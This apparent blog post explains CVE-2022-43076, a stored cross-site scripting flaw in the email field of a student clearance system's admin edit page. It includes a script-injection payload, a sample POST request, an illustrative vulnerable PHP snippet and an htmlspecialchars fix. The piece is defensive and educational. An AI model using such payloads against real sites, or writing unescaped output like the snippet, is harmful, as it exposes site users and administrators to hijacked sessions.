The world of web applications is always on edge due to vulnerabilities, and CVE-2022-43076 gives us a charged example. This vulnerability affects the popular *Web-Based Student Clearance System v1.*, specifically its edit administrator page. Here’s a breakdown of the vulnerability, a proof of concept, and what you can do to avoid getting hacked.

What is CVE-2022-43076?

CVE-2022-43076 is a Cross-Site Scripting (XSS) vulnerability in the /admin/edit-admin.php page. It allows attackers to inject malicious scripts directly into the application using the txtemail parameter. Once injected, these payloads can run in the browsers of users who visit the affected page — bad news for anyone with admin rights or sensitive information.

Where’s The Flaw?

The problem lies in not cleaning (sanitizing) or blocking special HTML characters submitted in the txtemail form input. Instead of just an email address, any text — including actual JavaScript code — can be saved and later executed.

Step 1: Find the Admin Edit Form

Navigate to:  
http://localhost/student_clearance_system/admin/edit-admin.php?editid=1

Enter this in the Email field (txtemail)

"><script>alert('XSS!')</script>

Step 3: Submit the Form

When the admin or anyone with access to /admin/edit-admin.php views the email, our payload will execute a JavaScript alert popup — that means XSS is working.

Here's what the POST body might look like

POST /admin/edit-admin.php?editid=1 HTTP/1.1
Host: target.site
Content-Type: application/x-www-form-urlencoded

txtname=John+Doe&txtemail=%22%3E%3Cscript%3Ealert('XSS!')%3C%2Fscript%3E


When this data is rendered in the admin panel, that JavaScript code will run!

Real-World Screenshot (Conceptual)

*Imagine seeing a pop-up saying "XSS!" every time you try to edit an admin’s details — that’s this bug in action.*

Here’s a simplified version of what the vulnerable code might look like

// Vulnerable code: no sanitation
$email = $_POST['txtemail'];
echo "<input type='text' name='txtemail' value='$email'>";

Escape or sanitize the input before displaying

$email = htmlspecialchars($_POST['txtemail'], ENT_QUOTES, 'UTF-8');
echo "<input type='text' name='txtemail' value='$email'>";

Just a single PHP function would stop this attack!

Official CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43076

Exploit-DB Entry:

https://www.exploit-db.com/exploits/51151

Packet Storm Mirror:

https://packetstormsecurity.com/files/169316/

Conclusion

CVE-2022-43076 is proof that even common mistakes — like missing input validation — can have big consequences. If you use the *Web-Based Student Clearance System v1.*, patch it up ASAP or apply input sanitization yourself.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 20:42:00 UTC